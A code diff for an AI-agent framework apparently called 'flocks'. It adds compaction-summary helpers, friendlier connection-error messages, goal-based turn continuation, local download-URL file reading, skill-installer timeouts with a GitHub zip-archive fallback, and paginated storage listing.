+        """Extract prompt-facing text from simple text/reasoning parts."""
+        text_parts: list[str] = []
+        for part in parts or []:
+            ptype = getattr(part, "type", None)
+            if ptype not in ("text", "reasoning", "thinking"):
+                continue
+            text = getattr(part, "text", "") or ""
+            if text:
+                text_parts.append(text)
+        return "\n".join(text_parts).strip()
+
+    @classmethod
+    def _is_summary_message(cls, msg_with_parts: Any) -> bool:
+        """Return True for persisted compaction summary messages."""
+        info = getattr(msg_with_parts, "info", None)
+        finish = getattr(info, "finish", None)
+        return finish == "summary" or bool(getattr(info, "summary", None))
+
+    @classmethod
+    def _latest_summary_boundary(cls, msgs_with_parts: list) -> tuple[int, Optional[str]]:
+        """Find the latest summary message and return ``(index, text)``."""
+        for idx in range(len(msgs_with_parts) - 1, -1, -1):
+            msg = msgs_with_parts[idx]
+            if not cls._is_summary_message(msg):
+                continue
+            summary_text = cls._message_text_from_parts(getattr(msg, "parts", []) or [])
+            return idx, summary_text or None
+        return -1, None
+
+    @classmethod
+    def _is_compaction_control_message(cls, msg_with_parts: Any) -> bool:
+        """Exclude slash-command control messages from summary deltas."""
+        info = getattr(msg_with_parts, "info", None)
+        role = getattr(info, "role", "")
+        if hasattr(role, "value"):
+            role = role.value
+        if role != "user":
+            return False
+
+        parts = getattr(msg_with_parts, "parts", []) or []
+        if parts and all(bool(getattr(part, "synthetic", None)) for part in parts):
+            return True
+        if any(getattr(part, "type", None) == "compaction" for part in parts):
+            return True
+
+        text = cls._message_text_from_parts(parts).strip()
+        if not text:
+            return False
+        first_line = text.splitlines()[0].strip()
+        return first_line == "/compact" or first_line.startswith("/compact ")
+
     @classmethod
     def _extract_chat_messages(
         cls,
diff --git a/flocks/session/lifecycle/retry.py b/flocks/session/lifecycle/retry.py
index 82339d6cd..fe6f79c99 100644
--- a/flocks/session/lifecycle/retry.py
+++ b/flocks/session/lifecycle/retry.py
@@ -19,6 +19,20 @@
 RETRY_BACKOFF_FACTOR = 2
 RETRY_MAX_DELAY_NO_HEADERS = 30_000  # 30 seconds
 RETRY_MAX_DELAY = 2_147_483_647  # max 32-bit signed integer
+CONNECTION_ERROR_DISPLAY_MESSAGE = (
+    "Model is unavailable. Please check the provider connection and model configuration."
+)
+CONNECTION_ERROR_PATTERNS = [
+    "connection error",
+    "connection reset",
+    "connection refused",
+    "could not connect",
+    "failed to connect",
+    "api connection",
+    "model unavailable",
+    "model is unavailable",
+    "model not available",
+]
 
 
 class SessionRetry:
@@ -177,7 +191,7 @@ def retryable(error: Dict[str, Any]) -> Optional[str]:
             transient_patterns = [
                 "unavailable", "503", "502",
                 "timeout", "timed out",
-                "connection error", "connection reset", "connection refused",
+                *CONNECTION_ERROR_PATTERNS,
                 "null message", "returned choice with null",
                 "empty streaming response", "empty choices",
             ]
@@ -187,3 +201,13 @@ def retryable(error: Dict[str, Any]) -> Optional[str]:
                 return "Connection or Server Error"
         
         return None
+
+    @staticmethod
+    def is_connection_error(error: Dict[str, Any]) -> bool:
+        """Return True for provider/model connection failures."""
+        data = error.get("data", {})
+        message = data.get("message") or error.get("message", "")
+        if not isinstance(message, str):
+            return False
+        message_lower = message.lower()
+        return any(pattern in message_lower for pattern in CONNECTION_ERROR_PATTERNS)
diff --git a/flocks/session/runner.py b/flocks/session/runner.py
index df2f11145..22406ce56 100644
--- a/flocks/session/runner.py
+++ b/flocks/session/runner.py
@@ -31,7 +31,7 @@
     DOOM_LOOP_THRESHOLD,
     REPEATED_EXACT_TOOL_CALL_HALT_THRESHOLD,
 )
-from flocks.session.lifecycle.retry import SessionRetry
+from flocks.session.lifecycle.retry import CONNECTION_ERROR_DISPLAY_MESSAGE, SessionRetry
 from flocks.session.lifecycle.compaction import SessionCompaction, CompactionPolicy
 from flocks.session.streaming.stream_processor import StreamProcessor
 from flocks.session.streaming.stream_events import (
@@ -1207,7 +1207,7 @@ async def device_asset_prompt_factory() -> Optional[str]:
         # The two counters are independent: empty-response retries (transient
         # model quirk) and exception retries (API errors) track separately so
         # that one kind of failure doesn't eat the other's budget.
-        MAX_ERROR_RETRIES = 7
+        MAX_ERROR_RETRIES = 3
         MAX_EMPTY_RETRIES = 3
         error_attempt = 0
         empty_attempt = 0
@@ -1366,6 +1366,7 @@ async def device_asset_prompt_factory() -> Optional[str]:
                         "attempt": error_attempt,
                         "delay_ms": delay_ms,
                         "reason": retry_message,
+                        "max_retries": MAX_ERROR_RETRIES,
                     })
                     
                     # Set retry status
@@ -1394,8 +1395,13 @@ async def device_asset_prompt_factory() -> Optional[str]:
                     else:
                         log.error("runner.step.not_retryable", {"error": str(e)})
 
+                    final_error_message = str(e)
+                    if SessionRetry.is_connection_error(error_dict):
+                        final_error_message = CONNECTION_ERROR_DISPLAY_MESSAGE
+                        error_dict["data"]["displayMessage"] = CONNECTION_ERROR_DISPLAY_MESSAGE
+
                     if self.callbacks.on_error:
-                        await self.callbacks.on_error(str(e))
+                        await self.callbacks.on_error(final_error_message)
                     
                     # Update assistant message with error (must be dict, not string)
                     await Message.update(
@@ -1405,7 +1411,7 @@ async def device_asset_prompt_factory() -> Optional[str]:
                         finish="error",
                     )
                     
-                    return StepResult(action="stop", error=str(e))
+                    return StepResult(action="stop", error=final_error_message)
         
         # Aborted
         return StepResult(action="stop", error="Aborted")
@@ -1813,10 +1819,14 @@ def _exception_to_error_dict(self, exception: Exception) -> Dict[str, Any]:
             "rate limit", "too many requests", "429",
             "overloaded", "unavailable", "503", "502",
             "timeout", "timed out", "server error",
-            "connection error", "connection reset", "connection refused",
         ]):
             error_dict["name"] = "APIError"
             error_dict["data"]["isRetryable"] = True
+
+        if SessionRetry.is_connection_error(error_dict):
+            error_dict["name"] = "APIError"
+            error_dict["data"]["isRetryable"] = True
+            error_dict["data"]["displayMessage"] = CONNECTION_ERROR_DISPLAY_MESSAGE
         
         return error_dict
     
diff --git a/flocks/session/session_loop.py b/flocks/session/session_loop.py
index 3423216c7..d09c7a14a 100644
--- a/flocks/session/session_loop.py
+++ b/flocks/session/session_loop.py
@@ -13,6 +13,7 @@
 """
 
 import asyncio
+import inspect
 import time
 from typing import Optional, List, Dict, Any, Callable, Awaitable
 from dataclasses import dataclass, field
@@ -38,6 +39,7 @@
 from flocks.session.lifecycle.compaction.compaction import _get_compaction_history
 from flocks.session.prompt import SessionPrompt
 from flocks.provider.provider import Provider
+from flocks.session.goal import GoalManager
 
 
 log = Log.create(service="session.loop")
@@ -1252,6 +1254,86 @@ async def progress_callback_overflow(stage: str, data: dict) -> None:
                     })
                     continue
 
+                if not step_result.error and last_message is not None:
+                    try:
+                        content_result = Message.get_text_content(last_message)
+                        last_response = (
+                            await content_result
+                            if inspect.isawaitable(content_result)
+                            else content_result
+                        )
+                    except Exception as exc:
+                        log.warn("goal.last_response.error", {
+                            "session_id": ctx.session.id,
+                            "message_id": getattr(last_message, "id", None),
+                            "error": str(exc),
+                        })
+                        last_response = getattr(last_message, "content", "") or ""
+                    pending_user_input = False
+                    try:
+                        from flocks.server.routes.question import has_pending_questions
+
+                        pending_user_input = has_pending_questions(ctx.session.id)
+                    except Exception as exc:
+                        log.warn("goal.pending_question_check.error", {
+                            "session_id": ctx.session.id,
+                            "error": str(exc),
+                        })
+                    goal_decision = await GoalManager.evaluate_after_turn(
+                        ctx.session.id,
+                        str(last_response or ""),
+                        pending_user_input=pending_user_input,
+                        provider_id=ctx.provider_id,
+                        model_id=ctx.model_id,
+                    )
+                    if goal_decision.status in {"completed", "blocked", "paused"} and goal_decision.objective:
+                        await cls._publish_runtime_event(callbacks, "session.goal.updated", {
+                            "sessionID": ctx.session.id,
+                            "status": goal_decision.status,
+                            "objective": goal_decision.objective,
+                            "reason": goal_decision.reason,
+                        })
+                    if goal_decision.should_continue and goal_decision.continuation_prompt:
+                        # Hermes-style goal continuation: append a user-role
+                        # prompt to history so the model continues, while
+                        # marking the part synthetic so UIs do not treat it as
+                        # user-authored text.
+                        goal_user = await Message.create(
+                            session_id=ctx.session.id,
+                            role=MessageRole.USER,
+                            content=goal_decision.continuation_prompt,
+                            agent=last_user.agent if hasattr(last_user, "agent") else ctx.agent_name,
+                            model=last_user.model if hasattr(last_user, "model") else {
+                                "providerID": ctx.provider_id,
+                                "modelID": ctx.model_id,
+                            },
+                            provider=last_user.provider if hasattr(last_user, "provider") else ctx.provider_id,
+                            synthetic=True,
+                            part_metadata={
+                                "goalContinuation": True,
+                                "goalVerdict": goal_decision.verdict,
+                                "goalReason": goal_decision.reason,
+                            },
+                        )
+                        turn_state = set_turn_state(
+                            ctx.session.id,
+                            step=ctx.step,
+                            status="continued",
+                            continue_reason="goal",
+                            queued_message_detected=False,
+                        )
+                        await cls._publish_runtime_event(callbacks, "turn.continued", {
+                            **turn_state.model_dump(by_alias=True),
+                            "goalMessageID": goal_user.id,
+                            "goalVerdict": goal_decision.verdict,
+                        })
+                        log.info("loop.continuing_for_goal", {
+                            "session_id": ctx.session.id,
+                            "goal_message_id": goal_user.id,
+                            "reason": goal_decision.reason,
+                        })
+                        continue
+
                 stop_reason = step_result.error or (getattr(last_message, "finish", None) if last_message else None) or "stop"
                 turn_state = set_turn_state(
                     ctx.session.id,
diff --git a/flocks/session/utils/file_extractor.py b/flocks/session/utils/file_extractor.py
index 5634b4cc0..1c77aa2c2 100644
--- a/flocks/session/utils/file_extractor.py
+++ b/flocks/session/utils/file_extractor.py
@@ -12,30 +12,65 @@
 import logging
 from pathlib import Path
 from typing import Optional
-from urllib.parse import unquote, urlparse
+from urllib.parse import parse_qs, unquote, urlparse
 
 _log = logging.getLogger(__name__)
 
 
-_TEXT_EXTRACTABLE_MIMES = frozenset({
-    "application/json",
-    "application/ld+json",
-    "application/xml",
-    "application/yaml",
-    "application/x-yaml",
-    "application/javascript",
-    "application/x-sh",
-    "application/x-shellscript",
-    "text/markdown",
-    "text/csv",
-})
+_TEXT_EXTRACTABLE_MIMES = frozenset(
+    {
+        "application/json",
+        "application/ld+json",
+        "application/xml",
+        "application/yaml",
+        "application/x-yaml",
+        "application/javascript",
+        "application/x-sh",
+        "application/x-shellscript",
+        "text/markdown",
+        "text/csv",
+    }
+)
 
 _DEFAULT_MAX_CHARS = 12_000
 _DEFAULT_MAX_PAGES = 20
+_LOCAL_DOWNLOAD_HOSTS = frozenset({"localhost", "127.0.0.1", "::1"})
+
+
+def file_url_to_path(url: str) -> str:
+    """Convert a ``file://`` URL to a local filesystem path string."""
+    parsed = urlparse(url)
+    path = unquote(parsed.path)
+    if len(path) >= 3 and path[0] == "/" and path[2] == ":" and path[1].isalpha():
+        path = path[1:]
+    if parsed.netloc and parsed.netloc.lower() != "localhost":
+        path = f"//{parsed.netloc}{path}"
+    return path
+
+
+def file_download_url_to_path(url: str) -> Optional[str]:
+    """Extract the local file path from the WebUI file download URL."""
+    parsed = urlparse(url)
+    if parsed.hostname and parsed.hostname not in _LOCAL_DOWNLOAD_HOSTS:
+        return None
+    if parsed.path != "/api/file/download":
+        return None
+    path_values = parse_qs(parsed.query).get("path")
+    if not path_values:
+        return None
+    return path_values[0]
+
+
+def _read_local_path(path: str) -> Optional[bytes]:
+    try:
+        return Path(path).read_bytes()
+    except Exception as e:
+        _log.debug("read_file_part_bytes: file read failed: %s (path=%s)", e, path)
+        return None
 
 
 def read_file_part_bytes(url: str) -> Optional[bytes]:
-    """Read raw bytes from a data URI or file:// URL.
+    """Read raw bytes from a data URI, file:// URL, or local download URL.
 
     Returns None when the URL is empty, has an unsupported scheme, or the
     underlying read fails.
@@ -50,12 +85,10 @@ def read_file_part_bytes(url: str) -> Optional[bytes]:
             _log.debug("read_file_part_bytes: data URI decode failed: %s", e)
             return None
     if url.startswith("file://"):
-        parsed = urlparse(url)
-        try:
-            return Path(unquote(parsed.path)).read_bytes()
-        except Exception as e:
-            _log.debug("read_file_part_bytes: file read failed: %s (path=%s)", e, parsed.path)
-            return None
+        return _read_local_path(file_url_to_path(url))
+    path = file_download_url_to_path(url)
+    if path:
+        return _read_local_path(path)
     return None
 
 
@@ -64,9 +97,7 @@ def is_text_extractable_mime(mime: str) -> bool:
     return mime.startswith("text/") or mime in _TEXT_EXTRACTABLE_MIMES
 
 
-def truncate_extracted_text(
-    text: str, max_chars: int = _DEFAULT_MAX_CHARS
-) -> tuple[str, bool]:
+def truncate_extracted_text(text: str, max_chars: int = _DEFAULT_MAX_CHARS) -> tuple[str, bool]:
     """Strip and truncate *text* to *max_chars*.
 
     Returns ``(truncated_text, was_truncated)``.
@@ -141,9 +172,11 @@ def extract_file_text(
 
 
 __all__ = [
-    "read_file_part_bytes",
-    "is_text_extractable_mime",
-    "truncate_extracted_text",
     "extract_pdf_text_from_bytes",
     "extract_file_text",
+    "file_download_url_to_path",
+    "file_url_to_path",
+    "is_text_extractable_mime",
+    "read_file_part_bytes",
+    "truncate_extracted_text",
 ]
diff --git a/flocks/skill/installer.py b/flocks/skill/installer.py
index 7f1a42e28..98583903f 100644
--- a/flocks/skill/installer.py
+++ b/flocks/skill/installer.py
@@ -19,12 +19,14 @@
 from __future__ import annotations
 
 import asyncio
+import io
 import os
 import platform
 import re
 import shutil
 import sys
 import tempfile
+import zipfile
 from dataclasses import dataclass, field
 from pathlib import Path
 from typing import Any, List, Optional
@@ -35,6 +37,10 @@
 
 log = Log.create(service="skill.installer")
 
+_NETWORK_TIMEOUT_SEC = 20
+_SKILLS_SH_CLI_TIMEOUT_SEC = 45
+_INSTALL_TIMEOUT_SEC = 90
+
 # ---------------------------------------------------------------------------
 # Result Types
 # ---------------------------------------------------------------------------
@@ -161,6 +167,42 @@ def _resolve_source(source: str) -> dict:
 class SkillInstaller:
     """Install skills from external sources and manage skill dependencies."""
 
+    @staticmethod
+    async def _run_subprocess(
+        cmd: list[str],
+        *,
+        timeout_sec: float,
+        cwd: Optional[str] = None,
+        env: Optional[dict[str, str]] = None,
+    ) -> tuple[int, str, str]:
+        proc = await asyncio.create_subprocess_exec(
+            *cmd,
+            cwd=cwd,
+            env=env,
+            stdout=asyncio.subprocess.PIPE,
+            stderr=asyncio.subprocess.PIPE,
+        )
+        try:
+            stdout_b, stderr_b = await asyncio.wait_for(
+                proc.communicate(),
+                timeout=timeout_sec,
+            )
+        except asyncio.TimeoutError:
+            try:
+                proc.kill()
+            except ProcessLookupError:
+                pass
+            try:
+                await asyncio.wait_for(proc.communicate(), timeout=5)
+            except Exception:
+                pass
+            raise TimeoutError(f"Command timed out after {timeout_sec:g}s: {' '.join(cmd)}")
+        return (
+            proc.returncode if proc.returncode is not None else 0,
+            stdout_b.decode(errors="replace"),
+            stderr_b.decode(errors="replace"),
+        )
+
     # ------------------------------------------------------------------
     # Install skill itself
     # ------------------------------------------------------------------
@@ -191,24 +233,32 @@ async def install_from_source(
 
         log.info("skill.install.start", {"source": source, "kind": kind, "scope": scope, "yes": yes})
 
-        if kind == "skills_sh":
-            return await cls._install_from_skills_sh(value, scope, yes=yes)
-        elif kind == "safeskill":
-            return await cls._install_from_safeskill(value, scope)
-        elif kind == "clawhub":
-            return await cls._install_from_clawhub(value, scope)
-        elif kind == "github":
-            return await cls._install_from_github(value, scope)
-        elif kind == "url":
-            return await cls._install_from_url(value, scope)
-        elif kind == "local":
-            return await cls._install_from_local(value, scope)
-        else:
+        async def _install() -> SkillInstallResult:
+            if kind == "skills_sh":
+                return await cls._install_from_skills_sh(value, scope, yes=yes)
+            elif kind == "safeskill":
+                return await cls._install_from_safeskill(value, scope)
+            elif kind == "clawhub":
+                return await cls._install_from_clawhub(value, scope)
+            elif kind == "github":
+                return await cls._install_from_github(value, scope)
+            elif kind == "url":
+                return await cls._install_from_url(value, scope)
+            elif kind == "local":
+                return await cls._install_from_local(value, scope)
             return SkillInstallResult(
                 success=False,
                 error=f"Unsupported source kind: {kind}",
             )
 
+        try:
+            return await asyncio.wait_for(_install(), timeout=_INSTALL_TIMEOUT_SEC)
+        except asyncio.TimeoutError:
+            return SkillInstallResult(
+                success=False,
+                error=f"Skill install timed out after {_INSTALL_TIMEOUT_SEC}s: {source}",
+            )
+
     @classmethod
     async def _install_from_skills_sh(
         cls,
@@ -267,22 +317,25 @@ async def _install_from_skills_sh_cli(
             cmd = [npx, "-y", "skills", "add", identifier]
             if yes:
                 cmd.append("-y")
-            proc = await asyncio.create_subprocess_exec(
-                *cmd,
-                cwd=str(staging),
-                env=env,
-                stdout=asyncio.subprocess.PIPE,
-                stderr=asyncio.subprocess.PIPE,
-            )
-            stdout_b, stderr_b = await proc.communicate()
-            output = (
-                stdout_b.decode(errors="replace")
-                + stderr_b.decode(errors="replace")
-            ).strip()
-            if proc.returncode != 0:
+            try:
+                returncode, stdout, stderr = await cls._run_subprocess(
+                    cmd,
+                    cwd=str(staging),
+                    env=env,
+                    timeout_sec=_SKILLS_SH_CLI_TIMEOUT_SEC,
+                )
+            except TimeoutError as exc:
+                return SkillInstallResult(success=False, error=str(exc))
+            except Exception as exc:
+                return SkillInstallResult(
+                    success=False,
+                    error=f"Failed to run skills.sh CLI: {exc}",
+                )
+            output = (stdout + stderr).strip()
+            if returncode != 0:
                 return SkillInstallResult(
                     success=False,
-                    error=output or f"skills.sh CLI failed with exit {proc.returncode}",
+                    error=output or f"skills.sh CLI failed with exit {returncode}",
                 )
 
             imported = cls._import_staged_skill_dirs(staging, scope)
@@ -337,21 +390,24 @@ async def _install_from_safeskill(cls, source: str, scope: str) -> SkillInstallR
                 "-a",
                 "universal",
             ]
-            proc = await asyncio.create_subprocess_exec(
-                *cmd,
-                cwd=str(staging),
-                stdout=asyncio.subprocess.PIPE,
-                stderr=asyncio.subprocess.PIPE,
-            )
-            stdout_b, stderr_b = await proc.communicate()
-            output = (
-                stdout_b.decode(errors="replace")
-                + stderr_b.decode(errors="replace")
-            ).strip()
-            if proc.returncode != 0:
+            try:
+                returncode, stdout, stderr = await cls._run_subprocess(
+                    cmd,
+                    cwd=str(staging),
+                    timeout_sec=_SKILLS_SH_CLI_TIMEOUT_SEC,
+                )
+            except TimeoutError as exc:
+                return SkillInstallResult(success=False, error=str(exc))
+            except Exception as exc:
+                return SkillInstallResult(
+                    success=False,
+                    error=f"Failed to run SafeSkill CLI: {exc}",
+                )
+            output = (stdout + stderr).strip()
+            if returncode != 0:
                 return SkillInstallResult(
                     success=False,
-                    error=output or f"SafeSkill CLI failed with exit {proc.returncode}",
+                    error=output or f"SafeSkill CLI failed with exit {returncode}",
                 )
 
             imported = cls._import_staged_skill_dirs(staging, scope)
@@ -404,7 +460,7 @@ async def _resolve_skills_sh_github_identifier(cls, identifier: str) -> Optional
             return None
 
         try:
-            async with httpx.AsyncClient(timeout=20, follow_redirects=True) as client:
+            async with httpx.AsyncClient(timeout=_NETWORK_TIMEOUT_SEC, follow_redirects=True) as client:
                 resp = await client.get(f"https://skills.sh/{normalized}")
                 if resp.status_code != 200:
                     return None
@@ -492,7 +548,7 @@ async def _install_from_clawhub(cls, name: str, scope: str) -> SkillInstallResul
 
         zip_url = f"https://wry-manatee-359.convex.site/api/v1/download?slug={name}"
         try:
-            async with httpx.AsyncClient(timeout=30, follow_redirects=True) as client:
+            async with httpx.AsyncClient(timeout=_NETWORK_TIMEOUT_SEC, follow_redirects=True) as client:
                 resp = await client.get(zip_url)
                 if resp.status_code == 404:
                     return SkillInstallResult(
@@ -633,34 +689,56 @@ async def _install_from_github(cls, repo_path: str, scope: str) -> SkillInstallR
             candidate_paths = [""]
 
         errors: List[str] = []
-        async with httpx.AsyncClient(
-            timeout=30,
-            follow_redirects=True,
-            headers={"Accept": "application/vnd.github+json"},
-        ) as client:
-            for branch in ("main", "master"):
-                for dir_path in candidate_paths:
-                    result = await cls._download_github_dir(
-                        client, owner, repo, branch, dir_path, scope
-                    )
-                    if result.success:
-                        return result
-                    if result.error:
-                        errors.append(result.error)
-
-            # Unauthenticated GitHub Contents API can return 403 rate-limit
-            # errors while raw.githubusercontent.com still works. In that case
-            # install the SKILL.md directly instead of reporting a misleading
-            # "directory not found" error.
-            for branch in ("main", "master"):
-                for dir_path in candidate_paths:
-                    result = await cls._download_github_skill_md_raw(
-                        client, owner, repo, branch, dir_path, scope
+        try:
+            async with httpx.AsyncClient(
+                timeout=_NETWORK_TIMEOUT_SEC,
+                follow_redirects=True,
+                headers={"Accept": "application/vnd.github+json"},
+            ) as client:
+                for branch in ("main", "master"):
+                    for dir_path in candidate_paths:
+                        result = await cls._download_github_dir(
+                            client, owner, repo, branch, dir_path, scope
+                        )
+                        if result.success:
+                            return result
+                        if result.error:
+                            errors.append(result.error)
+
+                # Unauthenticated GitHub Contents API can return 403 rate-limit
+                # errors while raw.githubusercontent.com still works. In that case
+                # install the SKILL.md directly instead of reporting a misleading
+                # "directory not found" error.
+                for branch in ("main", "master"):
+                    for dir_path in candidate_paths:
+                        result = await cls._download_github_skill_md_raw(
+                            client, owner, repo, branch, dir_path, scope
+                        )
+                        if result.success:
+                            return result
+                        if result.error:
+                            errors.append(result.error)
+
+                skill_hint = Path(subpath).name if subpath else None
+                for branch in ("main", "master"):
+                    result = await cls._download_github_archive_skill(
+                        client,
+                        owner,
+                        repo,
+                        branch,
+                        candidate_paths,
+                        skill_hint,
+                        scope,
                     )
                     if result.success:
                         return result
                     if result.error:
                         errors.append(result.error)
+        except Exception as exc:
+            return SkillInstallResult(
+                success=False,
+                error=f"GitHub download failed for {owner}/{repo}: {exc}",
+            )
 
         if errors and any("GitHub API 403" in error for error in errors):
             return SkillInstallResult(
@@ -677,6 +755,114 @@ async def _install_from_github(cls, repo_path: str, scope: str) -> SkillInstallR
             error=f"Could not find a skill directory in GitHub repo: {owner}/{repo}",
         )
 
+    @classmethod
+    async def _download_github_archive_skill(
+        cls,
+        client: Any,
+        owner: str,
+        repo: str,
+        branch: str,
+        candidate_paths: list[str],
+        skill_hint: Optional[str],
+        scope: str,
+    ) -> SkillInstallResult:
+        """Download a GitHub zip archive and import the matching skill directory."""
+        archive_url = f"https://codeload.github.com/{owner}/{repo}/zip/refs/heads/{branch}"
+        resp = await client.get(archive_url)
+        if resp.status_code != 200:
+            return SkillInstallResult(
+                success=False,
+                error=f"GitHub archive HTTP {resp.status_code} for {archive_url}",
+            )
+
+        try:
+            with zipfile.ZipFile(io.BytesIO(resp.content)) as zf:
+                return cls._import_skill_from_github_zip(
+                    zf,
+                    owner,
+                    repo,
+                    branch,
+                    candidate_paths,
+                    skill_hint,
+                    scope,
+                )
+        except zipfile.BadZipFile:
+            return SkillInstallResult(
+                success=False,
+                error=f"GitHub archive for {owner}/{repo}@{branch} is not a valid ZIP file",
+            )
+
+    @classmethod
+    def _import_skill_from_github_zip(
+        cls,
+        zf: zipfile.ZipFile,
+        owner: str,
+        repo: str,
+        branch: str,
+        candidate_paths: list[str],
+        skill_hint: Optional[str],
+        scope: str,
+    ) -> SkillInstallResult:
+        normalized_candidates = {path.strip("/") for path in candidate_paths}
+        skill_hint = (skill_hint or "").strip()
+        skill_mds = [name for name in zf.namelist() if name.endswith("/SKILL.md")]
+
+        for skill_md in skill_mds:
+            parts = Path(skill_md).parts
+            if len(parts) < 2:
+                continue
+            skill_dir = "/".join(parts[:-1])
+            relative_dir = "/".join(parts[1:-1])
+            dir_name = parts[-2]
+            try:
+                content = zf.read(skill_md).decode("utf-8")
+            except Exception:
+                continue
+            data = Skill._parse_frontmatter(content)
+            name = (data.get("name") or dir_name).strip()
+            if not name or not Skill._is_valid_name(name):
+                continue
+
+            if relative_dir not in normalized_candidates:
+                if not skill_hint or (name != skill_hint and dir_name != skill_hint):
+                    continue
+
+            skill_root = _resolve_install_root(scope) / name
+            skill_root.mkdir(parents=True, exist_ok=True)
+            skill_root_resolved = skill_root.resolve()
+            prefix = f"{skill_dir}/"
+            file_count = 0
+            for member in zf.namelist():
+                if not member.startswith(prefix) or member.endswith("/"):
+                    continue
+                rel_path = member[len(prefix):]
+                if not rel_path:
+                    continue
+                dest = (skill_root / rel_path).resolve()
+                try:
+                    dest.relative_to(skill_root_resolved)
+                except ValueError:
+                    continue
+                dest.parent.mkdir(parents=True, exist_ok=True)
+                dest.write_bytes(zf.read(member))
+                file_count += 1
+
+            Skill.clear_cache()
+            return SkillInstallResult(
+                success=True,
+                skill_name=name,
+                location=str(skill_root / "SKILL.md"),
+                message=(
+                    f"Skill '{name}' installed to {skill_root} "
+                    f"from GitHub archive {owner}/{repo}@{branch} ({file_count} files)"
+                ),
+            )
+
+        return SkillInstallResult(
+            success=False,
+            error=f"No matching SKILL.md found in GitHub archive for {owner}/{repo}@{branch}",
+        )
+
     @classmethod
     async def _download_github_skill_md_raw(
         cls,
@@ -852,7 +1038,7 @@ async def _install_from_url(
             )
 
         try:
-            async with httpx.AsyncClient(timeout=30, follow_redirects=True) as client:
+            async with httpx.AsyncClient(timeout=_NETWORK_TIMEOUT_SEC, follow_redirects=True) as client:
                 resp = await client.get(url)
                 if resp.status_code != 200:
                     return SkillInstallResult(
diff --git a/flocks/skill/skill.py b/flocks/skill/skill.py
index 2aabe5e3d..2bdb8f3cc 100644
--- a/flocks/skill/skill.py
+++ b/flocks/skill/skill.py
@@ -154,6 +154,7 @@ class SkillMetadata(BaseModel):
     os: Optional[List[str]] = None
     homepage: Optional[str] = None
     emoji: Optional[str] = None
+    ui_hidden: Optional[bool] = None
 
 
 class SkillInfo(BaseModel):
@@ -163,6 +164,7 @@ class SkillInfo(BaseModel):
     location: str = Field(..., description="Path to SKILL.md file")
     source: Optional[str] = Field(default=None, description="Discovery source")
     category: Optional[str] = Field(default=None, description="Skill category (e.g. 'system')")
+    ui_hidden: bool = Field(default=False, description="Whether the skill should be omitted from skill management UI")
     native: bool = Field(default=False, description=(
         "True only for project-installed skills (<cwd>/.flocks/plugins/skills/). "
         "All other locations (.flocks/skills/, ~/.flocks/plugins/skills/, .claude/) "
@@ -225,6 +227,7 @@ def _parse_skill_md(cls, filepath: str, source: Optional[str] = None) -> Optiona
             name = (data.get("name") or "").strip()
             description = (data.get("description") or "").strip()
             category = (data.get("category") or "").strip().lower() or None
+            ui_hidden = cls._as_bool(data.get("ui_hidden"))
 
             if not cls._is_valid_name(name) or not cls._is_valid_description(description):
                 return None
@@ -242,6 +245,7 @@ def _parse_skill_md(cls, filepath: str, source: Optional[str] = None) -> Optiona
                         skill_metadata = SkillMetadata.model_validate(raw_flocks)
                         install_specs = skill_metadata.install or None
                         requires = skill_metadata.requires or None
+                        ui_hidden = ui_hidden or bool(skill_metadata.ui_hidden)
                     except Exception as exc:
                         log.warn("skill.metadata.parse.error", {
                             "filepath": filepath,
@@ -258,6 +262,7 @@ def _parse_skill_md(cls, filepath: str, source: Optional[str] = None) -> Optiona
                 location=filepath,
                 source=source,
                 category=category,
+                ui_hidden=ui_hidden,
                 native=is_native,
                 metadata=skill_metadata,
                 install_specs=install_specs,
@@ -312,6 +317,14 @@ def _is_valid_name(name: str) -> bool:
     def _is_valid_description(description: str) -> bool:
         return 1 <= len(description) <= 1024
 
+    @staticmethod
+    def _as_bool(value: Any) -> bool:
+        if isinstance(value, bool):
+            return value
+        if isinstance(value, str):
+            return value.strip().lower() in {"1", "true", "yes", "on"}
+        return bool(value)
+
     @classmethod
     def _scan_directory(
         cls,
diff --git a/flocks/storage/storage.py b/flocks/storage/storage.py
index a7f042fdc..5614ef39a 100644
--- a/flocks/storage/storage.py
+++ b/flocks/storage/storage.py
@@ -978,6 +978,53 @@ async def list_entries(
             entries.append((key, value))
         return entries
 
+    @classmethod
+    async def list_entries_page(
+        cls,
+        prefix: str,
+        *,
+        offset: int = 0,
+        limit: int = 100,
+        model: Optional[Type[T]] = None,
+    ) -> tuple[List[Tuple[str, T | Any]], int]:
+        """List one page of entries for a prefix, plus total matching rows."""
+        await cls._ensure_init()
+
+        safe_offset = max(int(offset), 0)
+        safe_limit = max(int(limit), 0)
+        params = (f"{prefix}%",)
+
+        async with cls.connect(cls._db_path) as db:
+            async with db.execute(
+                "SELECT COUNT(*) FROM storage WHERE key LIKE ?",
+                params,
+            ) as cursor:
+                row = await cursor.fetchone()
+                total = int(row[0]) if row else 0
+
+            if safe_limit == 0:
+                return [], total
+
+            async with db.execute(
+                """
+                SELECT key, value FROM storage
+                WHERE key LIKE ?
+                ORDER BY key
+                LIMIT ? OFFSET ?
+                """,
+                (f"{prefix}%", safe_limit, safe_offset),
+            ) as cursor:
+                rows = await cursor.fetchall()
+
+        entries: List[Tuple[str, T | Any]] = []
+        for key, value_str in rows:
+            if model is not None and hasattr(model, "model_validate_json"):
+                value = model.model_validate_json(value_str)
+            else:
+                value = json.loads(value_str)
+            entries.append((key, value))
+        return entries, total
+
     @classmethod
     async def list_raw(
         cls,
@@ -1176,4 +1223,4 @@ async def list(cls, prefix: List[str] | str | None = None) -> List[List[str]]:
         keys = await cls.list_keys(prefix_str)
         
         # Convert string keys back to list format
-        return [key.split("/") for key in keys]
\ No newline at end of file
+        return [key.split("/") for key in keys]
diff --git a/flocks/tool/agent/task.py b/flocks/tool/agent/task.py
index b934de335..0ef7ad922 100644
--- a/flocks/tool/agent/task.py
+++ b/flocks/tool/agent/task.py
@@ -34,6 +34,7 @@
     name="task",
     description=DESCRIPTION,
     category=ToolCategory.SYSTEM,
+    native=False,
     parameters=[
         ToolParameter(
             name="description",
diff --git a/flocks/tool/catalog.py b/flocks/tool/catalog.py
index c9b0b9af1..5ee1ec6af 100644
--- a/flocks/tool/catalog.py
+++ b/flocks/tool/catalog.py
@@ -62,6 +62,7 @@ class ToolCatalogMetadata(BaseModel):
     "ssh_host_cmd": ["security", "remote-execution"],
     "ssh_run_script": ["security", "remote-execution"],
     "channel_message": ["messaging", "channel"],
+    "im_send_message": ["messaging", "channel", "im"],
     "flocks_mcp": ["mcp", "management"],
     "wecom_mcp": ["enterprise", "wecom"],
     "get_time": ["system", "utility"],
